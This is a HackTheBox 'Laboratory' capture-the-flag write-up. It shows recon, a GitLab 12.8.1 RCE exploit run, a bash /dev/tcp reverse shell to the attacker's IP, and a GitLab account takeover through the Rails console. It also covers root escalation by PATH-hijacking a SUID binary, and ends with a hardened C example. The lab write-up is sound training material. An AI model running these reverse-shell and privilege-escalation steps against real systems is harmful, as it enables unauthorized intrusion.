
HackTheBox: Laboratory


Foothold

[jusepe@nix:~/Documents/HackTheBox/Laboratory/recon]$ sudo scan laboratory.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 80,22,443
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn: 
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 132
         Nmap: 20

From the landing page it seems that it is just a static website.

Landing page

However, as the certificate's Subject Alternative Name in the nmap output suggests, there is a vhost, git.laboratory.htb, hosting a GitLab server with the following version:

Gitlab version

So I used an exploit from GitHub to get RCE:

[jusepe@nix:~/Documents/HackTheBox/Laboratory/exploits]$ python3 gitlab_rce.py https://git.laboratory.htb/ 10.10.15.193
Gitlab Exploit by dotPY [insert fancy ascii art]
registering DN80vPngRX:aIZiOH1BwY - 200
Getting version of https://git.laboratory.htb/ - 200
The Version seems to be 12.8.1! Choose wisely
delete user DN80vPngRX - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 2
Start a listener on port 42069 and hit enter (nc -vlnp 42069)
registering u1WsnWlcdu:PTQjQKzbEn - 200
creating project zAVpP0WEYB - 200
creating project zWHURuFZHz - 200
creating issue 3VawqGLTlk for project zAVpP0WEYB - 200
moving issue from zAVpP0WEYB to zWHURuFZHz - 200
Grabbing file secrets.yml
deploying payload - 500

However, the Ruby reverse shell is unstable, so I created a bash reverse shell script in /tmp to work more comfortably:

[jusepe@nix:~]$ rlwrap nc -lvnp 42069
listening on [any] 42069 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.216] 38278
echo "bash -i >& /dev/tcp/10.10.15.193/8888 0>&1" > /tmp/reverse.sh
chmod +x /tmp/reverse.sh
bash /tmp/reverse.sh

User

On the GitLab page there was only one member, dexter, which is also the name of the local user on the machine:

Dexter

So I reset his password from the GitLab Rails console, following this guide:

(remote) git@git.laboratory.htb:/$ gitlab-rails console -e production
--------------------------------------------------------------------------------
 GitLab:       12.8.1 (d18b43a5f5a) FOSS
 GitLab Shell: 11.0.0
 PostgreSQL:   10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0> user = User.where(id: 1).first
=> #<User id:1 @dexter>
irb(main):002:0> user.password = 'secret_pass'
=> "secret_pass"
irb(main):003:0> user.password_confirmation = 'secret_pass'
=> "secret_pass"
irb(main):004:0> user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 2bb9a4ed-40f7-4130-8b55-25257191ef03) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f4cca2677d0 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0> 

After logging in to his GitLab account there is a private repository that contains an id_rsa that we can use with SSH:

Private repo

Root

In order to escalate privileges to root, I checked the SUID binaries:

Suid

There was one binary I had not seen before, docker-security. I ran strings on it to figure out what it does and found that it is vulnerable to PATH hijacking: it calls setuid and then runs chmod through system() without an absolute path, so whichever chmod comes first in PATH is executed as root:

[jusepe@nix:~/Documents/HackTheBox/Laboratory/privesc]$ strings docker-security 
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
chmod 700 /usr/bin/docker
chmod 660 /var/run/docker.sock
;*3$"
GCC: (Debian 10.1.0-6) 10.1.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
docker-security.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

So I prepended /tmp to the PATH and created a chmod script there that spawns a bash shell when executed:

dexter@laboratory:/tmp$ echo "/bin/bash" > chmod
dexter@laboratory:/tmp$ /bin/chmod 777 chmod
dexter@laboratory:/tmp$ export PATH=/tmp:$PATH
dexter@laboratory:/tmp$ docker-security 
root@laboratory:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1000(dexter)
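As an added defensive example (not code from the box or from this writeup; the real source of docker-security is not on the page, so the vulnerable version below is an assumed reconstruction from the strings output), here is the pattern that makes the binary hijackable beside a hardened version that uses an absolute path, no shell, and a fixed environment:

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
/* Assumed reconstruction of the vulnerable pattern (the real source is not on
 * the page): system() runs the command via /bin/sh, which resolves "chmod"
 * through the caller's PATH, so a planted "chmod" runs as root after setuid. */
int vulnerable_fix_docker(void) {
    if (setuid(0) != 0 || setgid(0) != 0) return -1;
    if (system("chmod 700 /usr/bin/docker") != 0) return -1;
    return system("chmod 660 /var/run/docker.sock");
}

/* Hardened helper: absolute path, no shell, fixed minimal environment.
 * Returns the child's exit status, 127 if exec failed, -1 on fork/wait error. */
int run_fixed(const char *path, char *const argv[]) {
    static char *const clean_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(path, argv, clean_env);
        _exit(127);                       /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int hardened_fix_docker(void) {
    char *const a1[] = { "chmod", "700", "/usr/bin/docker", NULL };
    char *const a2[] = { "chmod", "660", "/var/run/docker.sock", NULL };
    if (setuid(0) != 0 || setgid(0) != 0) return -1;
    if (run_fixed("/bin/chmod", a1) != 0) return -1;
    return run_fixed("/bin/chmod", a2);
}

/* Self-check: set a PATH that puts /tmp first, as in the writeup, then confirm
 * a child started through run_fixed() still sees the clean PATH. 1 = clean. */
int child_sees_clean_path(void) {
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);          /* constructed value */
    char *const argv[] = { "sh", "-c",
        "[ \"$PATH\" = /usr/sbin:/usr/bin:/sbin:/bin ]", NULL };
    return run_fixed("/bin/sh", argv) == 0;
}

int main(void) {
    printf("child sees clean PATH: %s\n", child_sees_clean_path() ? "yes" : "no");
    return 0;
}
```

The hardened helper is what a setuid maintenance binary should look like; the self-check only exercises the environment sanitisation and does not touch /usr/bin/docker.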

WRITTEN BY
ITasahobby
InTernet lover